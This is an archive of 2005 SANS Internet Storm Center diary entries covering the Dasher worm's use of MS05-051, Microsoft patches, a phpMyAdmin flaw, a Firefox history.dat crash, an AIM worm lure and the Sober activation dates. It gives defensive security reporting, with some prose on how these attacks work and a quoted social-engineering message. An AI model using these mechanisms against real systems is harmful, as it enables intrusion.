A blog entry over at F-Secure mentions a new piece of malware dubbed "Dasher.A" that is trying to exploit the MS05-051 aka MSDTC vulnerability. The spreading mechanism seems to be very unreliable, but likely explains the surge in Port 1025 traffic we've seen recently . The captured packets look a lot like what the MS05-051 POC exploit posted at FrSIRT.com would cause.  [Thanks to Juha-Matti and David for reporting this.]

Update 15:27 UTC: Georg Wicherski from the German Honeynet Project has successfully captured the full exploit, including payload, on one of these tcp/1025 attacks. The payload will be called Dasher.B by F-Secure - and unlike the .A variant, this one does work, and drop a keylogger. Georg is planning to update mwcollect with MS05-051 detection and capture code over the next days.


Published: 2005-12-14

Greetings awareness - Awareness greetings ?

It is the seasonal greetings time of the year again and with the migration from the traditional postal cards to short text messages, e-mails and e-cards it's time to warn users of the dangers associated with the e-mails and e-cards.


Plain text messages obviously are little risk and don't need warnings against them. It gets worse when there are attachments involved. Some of these attachements will not be just a simple picture. Many will include executable programs. Those attachments might contain gifts you just do not want to receive.  The best policy with it is to ignore those wishes from people you do not know to start with and to even be extremely careful with the attachments to E-mails, even of the people you do know.  Let's face it many of those attachments are not created from scratch by the well-wisher, they contain foreign components where you might not have the needed trust in the creator.

Also show the good example and just send plain old text messages to your contacts. It's a matter of leading by example. We'll come back to this ...


E-cards are a different story. From a sender's perspective, there are a number of companies trying to offer a responsible service but how do you recognize them? If you use one of the services you give the company behind it the list of e-mail addresses of your friends. If the company is trustworthy that should cause little concern, but how can you be sure?

On the receiving end it gets worse, sometimes it says who tried to send you something, sometimes it doesn't. Sometimes you know the company sending you the e-card, sometimes you've never heard of them. You do know that the sender sometimes gets confirmations you went are read the card.
If you read this regularly, you might even be aware of possible cross site scripting issues that could be exploited somehow.

So what to do?

Start you own chain of secure greetings this year

Send out the E-mail greetings early this year to your contacts. Keep it plain text and ask them to please not send you e-cards as you will not read them this year over security reasons.

If enough people do that, there will hopefully be a few less incidents of people getting infected with all sorts of malware and loss of privacy.

Swa Frantzen


Published: 2005-12-14

Black tuesday - the day after

Traditionally we brace for impact on the Wednesday after the second Tuesday of the month. So far today has been rather uneventful. Big part is probably that the important update is actually fixing things that have been exploited already and therefore are already over their peak.

So in summary: Make sure you grab the MS05-054 update. It has fixes for things that have been exploited since last month.
It also fixes 3 more vulnerabilities, but the one actively exploited vulnerability makes this patch mandatory.

Swa Frantzen


Published: 2005-12-13

PCI Compliance

For those that have not heard,  Computerworld is reporting that Sam's Club is investigating a security breach involving credit card data.  This is going to be very interesting to see how the major credit card companies will enforce the PCI (Payment Card Industry) standards on large or small merchants.

Just thinking back, I do not remember a diary about the PCI standards, but I have slept once or twice in the past year since it came into existance.  So for those that have missed this, the major credit card companies have developed a set of data security standards that merchants will need to comply.  This include the Sam's Club's or other large merchants all the way down to that coffeehouse down the street who may only be processing 20,000 transactions in a year. (Personally I think that some subsection of these standards should also apply to merchants with a single transaction _ever_ .)  

As IT Security professionals, are you aware of locations within your company which processes credit card transactions?  If you aren't, then take a closer look there is probably somewhere in most companies.  Have your business complied with the PCI standards?  If you haven't,  you need to get moving because you are about 6 months late.

If you are looking for resources to catch up on PCI standards,  here are a few sites where you can get more information.  If any of you have other good resources, please go ahead and post them our direction.  I will update the below list with a more comprehensive list.


SANS PCI Webcast - November 2005
Visa Cardholder Information Security Program


Published: 2005-12-13

Gmail SSL Cert Expiration

For those that use POP3 access to Gmail, you have most likely seen some problems this afternoon with access.  We have received reports that one of the SSL certificates used within the certificate chain has expired.  We are investigating this, and hope to have something more to report later.

Update (22:30 UTC):  This seems to have been resolved in the past hour.  Not exactly sure what happened, but I guess that is what you get for using beta software right?  In any case, thank you google for the free 2.6G and growing disc space.


Published: 2005-12-13

Microsoft December Patches

Details about the MSFT December patches just showed up online. We will update this page as we find out more.

MS 05-54: Cumulative Security Update for Internet Explorer

First look: This DOES NOT fix the javascript window() issue. Still translating from "Microsoft" to "English".


MS 05-55: Vulnerability in Windows Kernel Could Allow Elevation of Privilege.

A vulnerability in the Asynchronous Procedure Call queue allows local users to escalate their privileges. A regular user (who has to be logged in first) could use this vulnerability to gain Administrator privileges.
Microsoft rates this vulnerability as "Important" as there is no direct remote vector to exploit this issue. However, coupled with an Internet Explorer vulnerability or similar issues, this could be used to gain Administrator privileges even if a user runs Internet Explorer as a less privileged user.
Note that remote exploit may be possible if user credentials are known.


Published: 2005-12-11

Port 53 Back on the Radar

Handler Patrick N. pointed out that port 53 has made a comeback as of late, with the release of W32.Spybot.ABDO.  Symantec's write-up points out that Spybot.ABDO "Opens a back door by connecting to an IRC server on the following domain through TCP port 53".  Looking at the Port 53 Report using DShield data, the amount of targets has more than doubled in the past ~48 hours.
Something to keep in mind is that this time there may be several unscrupulous activities using 53.  Other malware that has been discovered in recent months, using Port 53, include Backdoor.Civcat, Trojan.Esteems.C, Trojan.Esteems, and W32.Beagle.BH@mm. 

Any thoughts welcome.....


Published: 2005-12-11

Port 1025/6000 Action (Part II)

As reported by Koon Tan yesterday we have seen, and are continuing to see, increased activity reported by more users now.  The link below will show a graph that indicates activity over the past ~72 hours.


We still need full packet captures to help nail this down, so if anybody has them please submit them via the 'Contact' link at the top of the page.

Core Security Technologies has an excellent article on this subject and RPC Vulnerabilities.  One highlight from this article is that the "patches for these vulnerabilities ..... effectively fix the problem(s)" with the vunerabilities used in the discussion.  All of the vulnerabilities are more than 18 months old; these fixed have been out for some time, giving lots of time for admins to perform testing and loading of said patches.


Published: 2005-12-10


1) One reader has submitted a malware which after running through VirusTotal detected it as a Linux backdoor:
Ikarus    12.10.2005    Backdoor.Perl.Whoredoor.08
Kaspersky    12.10.2005    Rootkit.Linux.Matrics.sk
McAfee    4647    12.09.2005    Linux/BackDoor

2) On another note, Juha-Matti has pointed out an interesting Trojan.Spaxe. The interesting part is that it will display a balloon message, attempting to fake from the Windows Automatic Updates icon on the System Tray, with the following text:

"Your computer is infected!
Windows has detected spyware infection.

It is recommended to use special antispyware tools to prevent data loss.
Windows will now download and install the most up-to-date antispyware for you.

Click here to protect your computer from spyware."

Clicking on the balloon will result in downloading a file from the Internet.

3) You may have read from news that there will be a Sober worm attack on 5 Jan 06. This is due to the pre-programmed date of current Sober variant to activate on 5 Jan 06. The interesting part is that the Sober variant has the intelligence to create pseudorandom URLs which will change based on date. It also can synchronize the systems via atom clocks so that it does not matter even if the system clock is not correct. F-Secure has come out a list of URLs that you may want to block. You can read the details from F-Secure nice writeup.

[Update to (3)]
On another note, LURHQ has a writeup on the key dates in the various Sober variants. It mentioned that the Sober.Y activation date should be after 5 Jan 06. The logic is "current date > Jan 5" and not "current date == Jan 5". Thanks to Dominic for pointing out. 


Published: 2005-12-10

Ethereal Vulnerability

iDefense has publised an advisory on Ethereal OSPF Protocol Dissector Buffer Overflow Vulnerability. Successful exploiting the vulnerability will result in DoS and may allow the execution of arbitrary code under certain conditions. For more details, please refer to iDefense advisory. Thanks to Juha-Matti.


Published: 2005-12-10

Increase in Port 1025 scan

We have received a report on TCP port 1025 scan. David has observed an increase in port 1025 scan and submitted some packet captures to us. From the captured packet, it contains a request to interface UUID: 906b0ce0-c70b-1067-b317-00dd010662da and BuildContextW (opnum 7) RPC function. Part of the packet payload resembles the MSDTC exploit. This appears to be exploiting MS05-051 vulnerability as described in eEye advisory. If you have seen similar observation, do drop us a note.


Published: 2005-12-09

Microsoft advanced bulletin

Next week Microsoft will be releasing two security patches, which may be critical,
and may require a restart. One of which may or may not be the unpatched Internet
Explorer vulnerability reported by us here:
IE 0 Day
The Microsoft Advanced Bulletin is here:
They will also be updating the Malicious Software Removal Tool and releasing two
non-security updates.

Adrien de Beaupre
Handler of the Day
Cinnabar Networks Inc.


Published: 2005-12-08

Vulnerabilities in phpMyAdmin, Dell's TrueMobile 2300 Wireless Router and couple of PoC exploits.

Otherwise slow day was interrupted by a small flood of vulnerability advisories and exploits. Be sure to patch your systems if you use any of the products mentioned below.

Stefan Esser published a critical vulnerability in phpMyAdmin, popular web based MySQL administration package. What's interesting about this vulnerability is that, in fact, it happens in the code which should protect the application.
The variable $import_blocklist is supposed to list variables that may not be overwritten. However, as this variable is not protected, an attacker can overwrite it and change the blocklist, after which this can be exploited to execute arbitrary script code in user's browser session, in the context of the site running a vulnerable installation of phpMyAdmin.

If you use this product, be sure to upgrade to phpMyAdmin 2.7.0-p1 from http://sourceforge.net/project/showfiles.php?group_id=23067. The original advisory is at http://www.hardened-php.net/advisory_252005.110.html.

Thanks to Richard for sending the note!

Besides this, iDefense published an advisory about a design error in Dell's TrueMobile 2300 Wireless Broadband Router. By accessing a certain page it is possible to obtain another page which will allow an attacker to reset authentication credentials.
It was reported that the following firmware versions are affected:
*, dated 07/24/2003
*, dated 1/31/2004

Dell stated that this product is no longer being sold and that it was replaced with newer models which are not affected by this vulnerability, so no patch will be released.
We wonder if you can go and return the device for a new one - let us know if you try to do this.

Finally, PoC exploits for some old vulnerabilities have been released.

First one is for a two-year old Oracle 9i vulnerability, XDB HTTP Authentication Remote Stack Overflow Exploit. You can find more information about the vulnerability at http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727.

The second exploit was for HP OpenView Network Node Manager Remote Command Execution vulnerability. connectedNodes.ovpl, a script that comes with HP OpenView, had inadequate input validation so an attacker was able to execute arbitrary system level commands. HP released the patch for this vulnerability on 5th of October; their original advisory is available at http://itrc.hp.com/service/cki/docDisplay.do?docId=HPSBMA01224.


Published: 2005-12-08

First Vulnerability for Firefox 1.5 (released version) Announced - PoC available

When Firefox 1.5 was officially released I wondered when the first security vulnerability would be announced.  To be fair, it's taken longer than I thought it would.  Packetstorm Security has released proof of concept code that causes a buffer overflow and denial of service on the Firefox browser.  Long and short of it is, history.dat stores various pieces of information on websites you've visited.  If the topic of a page is crafted to be long enough, it will crash the browser each time it is started after going to such a page.  This vulnerability has been tested and does work, and no known patches are available at this time.  Once this happens, firefox will be unable to be started until you erase the history.dat file manually.  Presumably, if the topic was more tightly crafted than in the proof-of-concept code, a more malicious attack could be crafted that would install malware on the machine with the extra fun step of being reinstalled after each restart of firefox (unless you erase history.dat).

As we research this more, details will be added on to this post.


The machine I was testing this on has McAfee Enterprise 8, and Firefox would not crash.  Despite my valiant efforts in disabling the protection, I couldn't get it to crash.  While annoyed that I couldn't (short of uninstalling) get the protection disabled, it probablly is a good thing.  I'll test more when I get in the office tomorrow and have more machines to play with.

This seems to be more of a denial of service than a true buffer overflow.  It looks like Firefox just chokes on page topics that are too long.  Some people it hangs, other people it crashes.


However, the following is a workaround that should work (if it doesn't let me know).  Go to Tools -> Options.

Select the Privacy Icon, and then the History tab.  Set the number of days to save pages at 0.  This will disable writing anything to history.dat as far as I can tell, and should nullify the exploit.  Readers have confirmed that this workaround does prevent the buffer overflow.  You can also change your privacy settings to delete personal info when you close Firefox.

Another workaround is to modify prefs.js while Firefox has not been started and put in the line:


Lastly, you can also run the NoScript extension, found here.  (Which I have not looked at in depth.)  However, there are other ways of exploiting this where NoScript might not work.

Some users have reported being unable to reproduce this error.  I will test more to try to establish what makes this work and not.  So far it appears Mac users are not affected by this.


If you need to delete your history.dat file (in case you tested this PoC code), it can be difficult to locate where exactly this file is.
You can find instructions for locating the profile folder at the following URL: http://www.mozilla.org/support/firefox/edit#profile.

John Bambenek, bambenek *at* gmail *dot* com


Published: 2005-12-07

Malware, eBay, and You.

ISC reader Gareth Attrill pointed us to an eBay auction that has some escaped HTML code that sneaks in a link that tries to get a trojanized .jar (usage.jar) file loaded on anyone who loads the listing.  The latest .dat for McAfee immediately detected (and deleted) the code as Exploit-ByteVerify.  The lister most likely managed to bypass other protections that otherwise prevents this kind of code from being inserted into item listings.  Both eBay and the ISP that is hosting the malware have been notified.

The impact of this kind of attack is probably small, but it does present an interesting new vector for tricking users into going to locations that include the standard class of passive web browser exploits.  Something like this using code that wasn't immediately known to the AV vendors and using an item that was very popular (say an XBOX 360 at release) could create a situation ripe for widespread exploitation. 

Any site that allows users to enter HTML or images could theoretically be misused this way and illustrates the importance of validating end-user input, both in restricting what they can put in, and in the case of images that there is no exploits in the image files.  These checks need to be repeated instead of checking only when entered so that new DATs can examine existing files that may have gotten in before new DATs were implemented.

John Bambenek, bambenek *at* gmail *dot* com


Published: 2005-12-07

What? No URL?

The scenario goes something like this:  We get information that there is a potentially malicious site doing some not so nice things.  After investigating and working to figure out what is going on, we finally post an entry to let people know that there is an evil site out there and exactly what you will get if you visit that site. (Yes we also report it to try to get it taken down) Well, for most people, that's enough, but for others there is an insatiable urge to know exactly where that site is located which prompts an email to us asking that very question.   There are all sorts of reasons for why people want to know where the site is and my reasons for writing this are not to be little any of them as many of them are valid.   Its actually to try to set the record straight on why we try to avoid posting the URL to sites that are doing malicious things.  Here are a couple of reasons:

First, for some unknown reason, it is in our human nature to want to click on anything clickable!  Maybe its the rebel in us all, a form of expression.  Regardless of who you are, we all click on URLS, especially on sites that we trust.  How many viruses have you had to fight off at your organization from users clicking on links in email they got?  Well, we don't want to contribute to that infection rate.  However, if you are one of the very few, probably could be counted on one hand, who actually types every single URL, my hats off to you!!  But for the rest of us, we don't post the URL to malicious sites to help protect folks from themselves and that insatiable urge to click on things.     If we were to point users to a URL which has malware on it like (Don't click on that link) then there is a chance a security minded user could accidently click the link while copying it to an email or another window.  Whether your a newbie or an oldie, accidents do happen.

Second (you'll need to think devious), if you are a bad guy and you want to stay up on some of the latest exploits or if you have done some exploiting and wonder if someone is on to you, where would you look?  Well, major security sites with forums would be a good start.  A place where you can see what are the latest happenings as they are posted.   Since good guys as well bad guys visit our site,  we don't post the links to keep the "bad guys" from getting their hands on new malware or pointers to the latest exploit code.   The last thing we want to do is to help further their endevors.  Sure, if they want it they can probably find it, but we're not going to make it easy for them and they'll have to get it some where else.  We all need to be responsible with what we post and make available.  Things that can be used for good can be used for evil as well.

Hopefully this cleared up things for folks as to why we don't post the full URL to malicious sites or post the links to exploit code for that matter.  We really enjoy helping everyone and part of that is protecting everyone who visits the site.


Published: 2005-12-05

New AIM worm

Malware authors just opened their own holiday season. We received couple of reports of a new AIM worm spreading.
The worm is simple and doesn't exploit any vulnerability; instead it relies on social engineering.

The user will receive the following AIM message:

"This AIM user has sent you a Greetings Card, to open it visit: http://greetings.aol.com/index.pd?source=christmastheme?my_christmas_card.COM"

Instead of going to the AOLs site, this link actually points to a different site (http://<REMOVED>.<REMOVED>.134.156/My_Christmas_Card.COM) from which the user will download the worm.
This file is a SDBot variant and at the moment the most popular AV programs detect it generically.

Thanks to Joshua!


Published: 2005-12-05

Malware Analysis Quiz 5

For those following my quizes, today I released the results of the previous one and already posted the new one, the Malware Analysis Quiz 5, take a look and submit your answers!
Thanks for all the feedback received!
Pedro Bueno (pbueno //&&// isc. sans. org)


Published: 2005-12-03

Cisco Response to OpenSSL Vulnerability

Cisco has released a Security Notice in response to OpenSSL vulnerability discovered on Oct 05. It details the affected products and fixed release date. You can find the information at:


Published: 2005-12-03

Reports on IE exploit

There are a few reports indicating websites exploiting the IE vulnerability that currently has no patch. If you come across any such websites, do drop us a note.


Published: 2005-12-03

SANS 2006

If you are a developer, Oracle programmer or website manager and wish to get security training to improve your system security, there are a few classes designed for you for the upcoming SANS 2006. The classes include Secure Programming, Securing Oracle and Developing a Secure Internet Presence. You can find more details at:


Published: 2005-12-02


Ever wondered what to do with the XML output of an NMAP scan?  Me too.  Until I realized that you can easily parse it with a Perl module named NMAP::Parser.  More information and an example script that will be useful to all the security gurus who code in Perl on my page here: http://handlers.sans.org/khaugsness/

Let me know if you find this useful.


Published: 2005-12-02

Random stuff from the mailbag

There wasn't anything big enough to comprise a full story today, but there are lots of small items to mention:

1) Criminal groups are starting to exploit the (still unpatched) IE vulnerability.  This could get ugly soon.

2) Update: Several people have reported that a patch is now available, so patch now!...  There is a very serious bug in most Panda antivirus products that seems to still be unpatched.  This was announced several days ago.  Possible mitigation is to block .zoo attachments at your network entry points (email and web browsing).  Of course, you might be in trouble if Panda *is* your mail filtering server.

3) One person reported that Google now allows Gmail functionality to run on www.google.com.  This change caused his web filtering software company to categorize www.google.com as webmail.  And since his organization doesn't allow webmail access, users were blocked from google.  Did anybody else run into this problem?


Published: 2005-12-01

Cyber extortion. Podcast-style.

A reader wrote in with this interesting news story from eWeek.

Raises some interesting questions regarding RSS (security, intellectual property, etc).
(Thanks Eric.)


Published: 2005-12-01

Determining Sun Java Vulnerability

A number of folks in the community have written in describing their experiences determining if they are vulnerable to the Java issue mentioned previously.
It appears that depending on your platform/configuration the sunjavaupdate scheduler may not apply the updates or notify the end-user in a timely manner. It appears to check for updates on the one month anniversary of the original install. So it may not check again for quite some time.
The Sun Java download site will determine if an update is needed if you're using IE and ActiveX:

Also the JavaTester site details all the different methods for determining what if any JDK/JRE is installed:

Also be aware many systems accumulate Java versions over time so you may have more than one installed.


Published: 2005-12-01

Musings on the Internet Explorer 0-day vulnerability

So are any of you like me with regard to the Internet Explorer vulnerability mentioned last week http://isc.sans.org/diary.php?storyid=874? I know that I am watching and waiting to see if Microsoft is going to release an out of cycle patch, or wait for December 13th patch day.  If I were a gambler, I might actually bet on Microsoft releasing it early.

Why do I think this way?  Well.... Glad you asked.

Yesterday, Microsoft updated the advisory located at KB911302 with a couple of tidbits.  First, they made mention of both Proof of Conecept and malicious software which appear to be targeting the reported vulnerability.  Second, they also mention the Windows Live Safety Center where end users can scan and remove any malicious software and variants that may be running around now.

Throwing in that Microsoft has on occasion released out-of-cycle patches (June 2004 is a case in point in my mind), then I think it is a safe bet that Microsoft will take appropriate steps to fix the problem as quickly as possible.  In the meantime there are 2 things I can continue to suggest.

1) Be vigilant.  Know that a patch will be forthcoming hopefully within the next 2 weeks and be ready to deploy quickly.

2) If your organization can operate with one of the workarounds Microsoft has mentioned in KB911302, then I recommend mitigating your risk as much as possible.  We all have at least one person who is a little too...uhm...liberal with browsing the Internet on company time.  Think about it, that very person is probably shopping for Christmas* presents right now on less-than-secure sites.  SO....I would suggest doing those workarounds to that computer first.  :-)

* For those that celebrate other holidays in December than Christmas, this statement is not meant to be offensive in any shape or form, or otherwise slight your holiday of choice.


It was just a question of when will malware authors start exploiting this Internet Explorer vulnerability.
When users visit certain web sites, a file will be dropped on their machine using this exploit. The file being dropped is currently detected as TrojanDownloader:Win32/Delf.DH. When executed, this dropper will download another trojan.

Microsoft published information about this trojan at http://www.microsoft.com/security/encyclopedia/details.aspx?name=TrojanDownloader:Win32/Delf.DH.

Thanks to Juha-Matti!